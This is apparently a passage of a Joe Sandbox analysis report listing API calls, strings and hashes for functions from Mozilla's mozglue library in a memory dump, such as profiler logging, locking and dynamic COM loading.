                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                  • String ID:
                                                                  • API String ID: 922945588-0
                                                                  • Opcode ID: 25fe88fd7cd994a032bc37eee0e023f83d5bf950457ab4cd688909834ff2d562
                                                                  • Instruction ID: 322721848ea861aa77412dab5ecd999a58fcaf2b04e6ae1bb59a4380724da76a
                                                                  • Opcode Fuzzy Hash: 25fe88fd7cd994a032bc37eee0e023f83d5bf950457ab4cd688909834ff2d562
                                                                  • Instruction Fuzzy Hash: EA518B357006008FCB19CF59C6C4A6ABBF5FF89318B69895DE99AA7351C730EC01CB98
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C641D0F
                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,6C641BE3,?,?,6C641D96,00000000), ref: 6C641D18
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,6C641BE3,?,?,6C641D96,00000000), ref: 6C641D4C
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C641DB7
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C641DC0
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C641DDA
                                                                    • Part of subcall function 6C641EF0: GetCurrentThreadId.KERNEL32 ref: 6C641F03
                                                                    • Part of subcall function 6C641EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C641DF2,00000000,00000000), ref: 6C641F0C
                                                                    • Part of subcall function 6C641EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C641F20
                                                                  • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C641DF4
                                                                    • Part of subcall function 6C60CA10: malloc.MOZGLUE(?), ref: 6C60CA26
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 1880959753-0
                                                                  • Opcode ID: 5aba73f4b158dc6b28f43cf106c799ab856eda16cc62e39b65ca5b2f6c98eb94
                                                                  • Instruction ID: 9aad976bc718f0d7facb545b2681b80cfd853fb67d109a1771bc27cce92c357f
                                                                  • Opcode Fuzzy Hash: 5aba73f4b158dc6b28f43cf106c799ab856eda16cc62e39b65ca5b2f6c98eb94
                                                                  • Instruction Fuzzy Hash: 25417BB5201700AFCB14DF29C488A56BBF9FF89354F10882DE95A87B41CB71F854CBA9
                                                                  APIs
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6384F3
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C63850A
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C63851E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C63855B
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C63856F
                                                                  • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6385AC
                                                                    • Part of subcall function 6C637670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C63767F
                                                                    • Part of subcall function 6C637670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C637693
                                                                    • Part of subcall function 6C637670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6376A7
                                                                  • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6385B2
                                                                    • Part of subcall function 6C615E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C615EDB
                                                                    • Part of subcall function 6C615E90: memset.VCRUNTIME140(ewel,000000E5,?), ref: 6C615F27
                                                                    • Part of subcall function 6C615E90: LeaveCriticalSection.KERNEL32(?), ref: 6C615FB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                  • String ID:
                                                                  • API String ID: 2666944752-0
                                                                  • Opcode ID: ee08a71d84c9ca3751d90f5be5f229d953436dc28690bbf4a6354d3cff8c08cc
                                                                  • Instruction ID: 25127b9a0646a2851f96e90ce7c00984f1abcf33c0c18be027e00a36e3988d8b
                                                                  • Opcode Fuzzy Hash: ee08a71d84c9ca3751d90f5be5f229d953436dc28690bbf4a6354d3cff8c08cc
                                                                  • Instruction Fuzzy Hash: 4521D3702016119FDB14DF25C888A9AB7B5AF8931CF24582EE54FC3B41DB31F948CBA9
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C601699
                                                                  • VerSetConditionMask.NTDLL ref: 6C6016CB
                                                                  • VerSetConditionMask.NTDLL ref: 6C6016D7
                                                                  • VerSetConditionMask.NTDLL ref: 6C6016DE
                                                                  • VerSetConditionMask.NTDLL ref: 6C6016E5
                                                                  • VerSetConditionMask.NTDLL ref: 6C6016EC
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6016F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                  • String ID:
                                                                  • API String ID: 375572348-0
                                                                  • Opcode ID: bc7b716ca72869fd2e98c8cc6d39d1cc2dd4eb78d0c35e5c74e4eae7423c86a3
                                                                  • Instruction ID: 96c6189e59ad3822e92b8b00299f4e083a3173ce71709572423143d70899de1d
                                                                  • Opcode Fuzzy Hash: bc7b716ca72869fd2e98c8cc6d39d1cc2dd4eb78d0c35e5c74e4eae7423c86a3
                                                                  • Instruction Fuzzy Hash: 0D2127B07442086FEB155A658C89FFB737CDFC6704F004928F6059B1C0C6789D5487BA
                                                                  APIs
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C63945E
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639470
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639482
                                                                    • Part of subcall function 6C639420: __Init_thread_footer.LIBCMT ref: 6C63949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63DE73
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C66FEF3,?,?,?,?,?,?,00000000), ref: 6C63DE7B
                                                                    • Part of subcall function 6C6394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6394EE
                                                                    • Part of subcall function 6C6394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C639508
                                                                    • Part of subcall function 6C62CBE8: GetCurrentProcess.KERNEL32(?,6C5F31A7), ref: 6C62CBF1
                                                                    • Part of subcall function 6C62CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5F31A7), ref: 6C62CBFA
                                                                  • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000), ref: 6C63DEB8
                                                                  • free.MOZGLUE(00000000), ref: 6C63DEFE
                                                                  • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C63DF38
                                                                  Strings
                                                                  • [I %d/%d] locked_profiler_stop, xrefs: 6C63DE83
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CurrentProcessThread$BufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                  • String ID: [I %d/%d] locked_profiler_stop
                                                                  • API String ID: 3136165603-3405337583
                                                                  • Opcode ID: 53827cb856ca243930f7e1ae356d55a3ec6c91c6e69760530e4b847d173c59b6
                                                                  • Instruction ID: 116fe8d4a6c997adc3d56d74ed05eeba215a6d23a82cdab1337d6afe7d69c649
                                                                  • Opcode Fuzzy Hash: 53827cb856ca243930f7e1ae356d55a3ec6c91c6e69760530e4b847d173c59b6
                                                                  • Instruction Fuzzy Hash: CC210B75B011304BEB298B26CC44B997775EF8230DF541419D90D87B81CB34981ACBEE
                                                                  APIs
                                                                    • Part of subcall function 6C62CBE8: GetCurrentProcess.KERNEL32(?,6C5F31A7), ref: 6C62CBF1
                                                                    • Part of subcall function 6C62CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5F31A7), ref: 6C62CBFA
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C63945E
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639470
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639482
                                                                    • Part of subcall function 6C639420: __Init_thread_footer.LIBCMT ref: 6C63949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F619
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C63F598), ref: 6C63F621
                                                                    • Part of subcall function 6C6394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6394EE
                                                                    • Part of subcall function 6C6394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C639508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F637
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8,?,?,00000000,?,6C63F598), ref: 6C63F645
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8,?,?,00000000,?,6C63F598), ref: 6C63F663
                                                                  Strings
                                                                  • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C63F62A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                  • API String ID: 1579816589-753366533
                                                                  • Opcode ID: 69fb0f28c32a1c3098edbcc23dcdd433cb50f8bdde4f2dd67dfa4e7390846be1
                                                                  • Instruction ID: 7bad711f6ea3cee894b8fd0d0646eaac6cbf5bd85e2d919026bb92436a242b83
                                                                  • Opcode Fuzzy Hash: 69fb0f28c32a1c3098edbcc23dcdd433cb50f8bdde4f2dd67dfa4e7390846be1
                                                                  • Instruction Fuzzy Hash: 36119875201124ABDB089F59C588DD57779FF86368F502855EA0583F02CB71A825CFBD
                                                                  APIs
                                                                    • Part of subcall function 6C62AB89: EnterCriticalSection.KERNEL32(6C67E370,?,?,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284), ref: 6C62AB94
                                                                    • Part of subcall function 6C62AB89: LeaveCriticalSection.KERNEL32(6C67E370,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C62ABD1
                                                                  • LoadLibraryW.KERNEL32(combase.dll,6C601C5F), ref: 6C6020AE
                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C6020CD
                                                                  • __Init_thread_footer.LIBCMT ref: 6C6020E1
                                                                  • FreeLibrary.KERNEL32 ref: 6C602124
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                  • String ID: CoInitializeSecurity$combase.dll
                                                                  • API String ID: 4190559335-2476802802
                                                                  • Opcode ID: aabcd48111bfaa3d4d50c59fe64812c594492a92533bce0a7fb4c3415498a45b
                                                                  • Instruction ID: e2a287d16e3c3005b670adc85553042cda59e909f092384983241076fc45decd
                                                                  • Opcode Fuzzy Hash: aabcd48111bfaa3d4d50c59fe64812c594492a92533bce0a7fb4c3415498a45b
                                                                  • Instruction Fuzzy Hash: 5521AF35200219EFEF1A8F66CD88DDA3B75FF5A369F004815FA0192610D3319861CF7A
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32 ref: 6C6576F2
                                                                  • moz_xmalloc.MOZGLUE(00000001), ref: 6C657705
                                                                    • Part of subcall function 6C60CA10: malloc.MOZGLUE(?), ref: 6C60CA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C657717
                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C65778F,00000000,00000000,00000000,00000000), ref: 6C657731
                                                                  • free.MOZGLUE(00000000), ref: 6C657760
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                  • String ID: }>cl
                                                                  • API String ID: 2538299546-2620422864
                                                                  • Opcode ID: 0d4b75c09152019fcf1fce0dca8a463cd5f01a728b2177be491fa6ceb2aee01a
                                                                  • Instruction ID: f9d91231da414511695c2dd863d359bea9fc20329ebd901e45e3535af0c10a75
                                                                  • Opcode Fuzzy Hash: 0d4b75c09152019fcf1fce0dca8a463cd5f01a728b2177be491fa6ceb2aee01a
                                                                  • Instruction Fuzzy Hash: 7C11B2B19043256FE710AF7A9D44BABBEE8EF46354F144829F888A7300E770985087E6
                                                                  APIs
                                                                    • Part of subcall function 6C62AB89: EnterCriticalSection.KERNEL32(6C67E370,?,?,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284), ref: 6C62AB94
                                                                    • Part of subcall function 6C62AB89: LeaveCriticalSection.KERNEL32(6C67E370,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C62ABD1
                                                                  • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C601FDE
                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C601FFD
                                                                  • __Init_thread_footer.LIBCMT ref: 6C602011
                                                                  • FreeLibrary.KERNEL32 ref: 6C602059
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                  • String ID: CoCreateInstance$combase.dll
                                                                  • API String ID: 4190559335-2197658831
                                                                  • Opcode ID: 0132458899fd1a50d9f2fa60f10c31385427774e52d1124f96e0dcd964ef2ea0
                                                                  • Instruction ID: 1d19d2faa4a30bc4afde213eea24160a3d043bc4282fd0fb5721af2a4e27845e
                                                                  • Opcode Fuzzy Hash: 0132458899fd1a50d9f2fa60f10c31385427774e52d1124f96e0dcd964ef2ea0
                                                                  • Instruction Fuzzy Hash: B6117C74305214AFEF29CF16C98CEA63B79FB96369F004829F90592650C7319861CFBA
                                                                  APIs
                                                                    • Part of subcall function 6C62AB89: EnterCriticalSection.KERNEL32(6C67E370,?,?,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284), ref: 6C62AB94
                                                                    • Part of subcall function 6C62AB89: LeaveCriticalSection.KERNEL32(6C67E370,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C62ABD1
                                                                  • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C62D9F0,00000000), ref: 6C600F1D
                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C600F3C
                                                                  • __Init_thread_footer.LIBCMT ref: 6C600F50
                                                                  • FreeLibrary.KERNEL32(?,6C62D9F0,00000000), ref: 6C600F86
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                  • String ID: CoInitializeEx$combase.dll
                                                                  • API String ID: 4190559335-2063391169
                                                                  • Opcode ID: 06e603c80364587e2b868d363fdd1ed57763896dbb9dcdc97d4c399cea188116
                                                                  • Instruction ID: bc0c0d5b476d5eb4b19ddba923946b22ccad54dab22c8e496f2680d9c0e99cbb
                                                                  • Opcode Fuzzy Hash: 06e603c80364587e2b868d363fdd1ed57763896dbb9dcdc97d4c399cea188116
                                                                  • Instruction Fuzzy Hash: 6B11A3B43052609BEF09CF66CA88E863774F79B366F004A19ED0592740D7729405CF7E
                                                                  APIs
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C63945E
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639470
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639482
                                                                    • Part of subcall function 6C639420: __Init_thread_footer.LIBCMT ref: 6C63949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F559
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C63F561
                                                                    • Part of subcall function 6C6394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6394EE
                                                                    • Part of subcall function 6C6394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C639508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63F577
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63F585
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63F5A3
                                                                  Strings
                                                                  • [I %d/%d] profiler_pause_sampling, xrefs: 6C63F3A8
                                                                  • [I %d/%d] profiler_resume_sampling, xrefs: 6C63F499
                                                                  • [I %d/%d] profiler_resume, xrefs: 6C63F239
                                                                  • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C63F56A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                  • API String ID: 2848912005-2840072211
                                                                  • Opcode ID: 12cc2f4c6d51d299124870ced7b231a1a53cc3b290e3f59f3d6fef9f3ea642e6
                                                                  • Instruction ID: dcec9a41844f20137414fce123485eec07cc9d9980309b9cd98432e4b122d322
                                                                  • Opcode Fuzzy Hash: 12cc2f4c6d51d299124870ced7b231a1a53cc3b290e3f59f3d6fef9f3ea642e6
                                                                  • Instruction Fuzzy Hash: B5F0B4762002209FDB056F66988CD5A77BCEFC62ADF101C15FA0983702DB3548058B7E
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(kernel32.dll,6C600DF8), ref: 6C600E82
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C600EA1
                                                                  • __Init_thread_footer.LIBCMT ref: 6C600EB5
                                                                  • FreeLibrary.KERNEL32 ref: 6C600EC5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                  • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                  • API String ID: 391052410-1680159014
                                                                  • Opcode ID: 7298e0ddad34e256f21b373e16600edc86d4884e6aee3bec50d44bc3537563e9
                                                                  • Instruction ID: a47f7658a69eee80604d2532f12a0928199efa72845fac865a7ce65b76f43857
                                                                  • Opcode Fuzzy Hash: 7298e0ddad34e256f21b373e16600edc86d4884e6aee3bec50d44bc3537563e9
                                                                  • Instruction Fuzzy Hash: A301E1747043918BDB1A8F9AE994E5237B5F747355F100D15D90163B40D778A485CE2F
                                                                  APIs
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C63945E
